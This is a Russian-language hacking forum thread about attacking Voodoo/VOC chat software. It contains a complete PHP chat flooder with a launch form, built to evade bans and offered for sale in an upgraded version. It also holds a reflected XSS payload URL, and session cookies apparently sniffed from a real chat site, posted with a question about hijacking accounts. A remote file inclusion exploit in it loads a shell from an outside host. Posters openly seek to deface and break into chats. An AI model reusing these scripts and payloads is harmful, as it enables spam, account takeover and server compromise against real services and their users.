Знаю что лол) но обьясните как открыть html страницу sendera? если вы про просмотр хтмл кода, то у сендера он не открываетЦа.
Блин пацаны всё уже пробовал на http://www.love-chat.ru/voc.php и три разных снифа засылал в ответ молчёк может что не так делаю? Вот мужчины не поленитесь объясните чайнику,но стремящемуся из чайников в самовары)), на пальцах как вы это делаете. А то тут такая ситуация админы-гестаповцы и все как один орут что наш чат не ломается обидно просто. Хочется большими буквами написать в центре "Свобода" и повесить рисунок паука)))). Помогите если не трудно
php Флудер для Voc чатов vocflood.php PHP: <? ######### ######### ######### G h o _ s t [ c ] 2 o o 7 ######### ######### ######### $k = mt_rand(0,99); mt_srand(time() + (double)microtime()*$k); $chat=$_GET['chat']; $name=$_GET['name']; $pass=$_GET['pass']; $Text=$_GET['Text']; $r = $_GET['r']; $SID = join('',file("$chat./voc.php?user_name=$name&password=$pass&room=$r")); $st1 = strpos($SID,"?session="); $SID = substr($SID,$st1+9); $st2 = strpos($SID,"&"); $SID = substr($SID,0,$st2); # сессия $Color = mt_rand(0, 22); # случайный цвет $Text = $Text.mt_rand(0,999);$Text = UrlEncode($Text); $df = file("$chat./sender.php?session=$SID&mesg=$Text&user_color=$Color"); $df2 = file("$chat/logout.php?session=$SID"); echo "<script language=javascript>document.location.reload();</script>"; ?> и HTML форма для удобства HTML: <HTML> <h1>Voodoo chat flooder</h1><h2>by Gho_st</h2> <form action="vocflood.php" method="GET"> Аддрес чата <input type=text name=chat value="http://"><br> Ник <input type=text name=name><br> Пароль <input type=text name=pass><br> Строка <input type=text name=Text><br> Комната <select name="r" class="input" tabindex="102"> <option value="0" selected>1</option> <option value="1">2</option> <option value="2">3</option> <option value="3">4</option> <option value="4">5</option> </select> <input type=submit value="Запустить"> </HTML> уже вроде был выложен один флудер для voc чатов мой флудер имеет некотрые преимущества перед ним в частности не надо каждый раз вписывать сессию + он рабоает циклично заходит отправляет сообщение выходит таким образом забанить такого бота не такто просто ___ з.ы. есть более продвинутая версия бота недорого ... пишите в асю
к сожелению при тестирование флудера на движке VOC++ Business Edition было выявлено то что сообщения не отправляются хм.. почему то вобще при передаче GET запросом сессии и текста сообщения мессага не отправляется=(( если ктонибудь знает в чем трабла просветите
ещё один XSS в Voc Code: http://sitename/chat/users.php?look_for=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E
У нас любимая бага была в сети..стоял у нас VOC++ Christ. Edit..ещё и дэмо =) Собирали чел 5 и зажимали ENTER или пихали спички. Вот весёлые были времена
Прет! Короче такой вот бок у меня вышол! Мне приходят на снифф куки из чата на meta.ua(там походу вуду чат) ! Вот пример String: c_design=meta; c_hash=14a512f21614e9289927afaf0984298c; c_ulang=ru; c_user_color=14; tR; ui=UA8918T1195169226462; cl; adui=0UA52643edaT473daf3f; ltm=halfhour; scook=1 Я через Оперу заменяю значения своих куки на те что пришли! Но когда обновляю нифига не происходит-пароли и логин автоматом не заполняются!((((! Много раз пробовал заменять и ничего! Мож что то не то делаю?? Может подскажите Что то? А то я уже в шоке!ёп
И не заполнятся. В Вуду чатах в куках не содержится информации, способоной дать доступ к чужому аккаунту.
взлом народ я не очень хорошо разбираюсь по взлому... но мне очень хочется научиться ломать voodoo чаты...может кто не занят,а? уделит мне немного времени....
Народ кто знает как прописывать себе деньги в чате VOC++ Business Special Edition????и возможно ли такое??
Народ , видал я вот такую багу в Voodoo : Bug in : index.php # #Vlu Code : #-------------------------------- #//here it can fails, i don't care. will be used default system language # # else include_once($file_path."languages/".$language.".php"); # # include($file_path."designes/".$design."/index.php"); #?> #================================================================= # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/index.php?file_path=http://SHELLURL.COM? только чего-то не выходит . пишет 404 ошибку . Так подскажите то ли я чего не так делаю , то ли пропачена уязвимость датирована она 2006-08-02 . Помогите разобраться
А может быть я чего-то недопонимаю , тогда те кто уже юзали сей эксплойт ... объясните на пальцах плиз ...